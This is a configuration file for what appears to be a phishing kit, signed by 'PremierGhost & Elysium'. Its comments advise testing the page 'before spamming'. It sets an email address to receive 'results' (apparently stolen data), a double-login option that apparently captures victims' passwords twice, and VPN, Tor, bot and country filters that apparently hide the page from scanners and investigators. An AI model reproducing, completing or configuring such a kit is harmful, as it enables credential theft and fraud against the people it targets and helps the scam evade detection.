; .------..------.
; |E.--. ||P.--. |
; | (\/) || :/\: |
; | :\/: || (__) |
; | '--'E|| '--'P|
; `------'`------'

; Always test your page before spamming
; & most importantly, have a good day !
;   - 🐺 PremierGhost & Elysium 🐎 -

; Admin Panel Login
; Options: credentials

Username = ""
Password = ""

; Your email for results
; Options: email address

Email = ""

; Double login
; Options: on or off

LoginTwice = "off"

; Whitelist your IP
; Use a VPN / Proxy !
; Options: IP or off

MyIP = ""

; Proxy, Hosting, Tor detection
; Options: on or off

VPN = "off"

; Proxy, Hosting, Tor detection
; Not 100% reliable though
; Options: on or off

HeuristicVPN = "off"

; Special "cloudflare" protection
; will block 99% of bots in theory
; Options: on or off

CFProtection = "on"

; Allow access to a specific country
; Options: country code or off

CountryLock = "+1"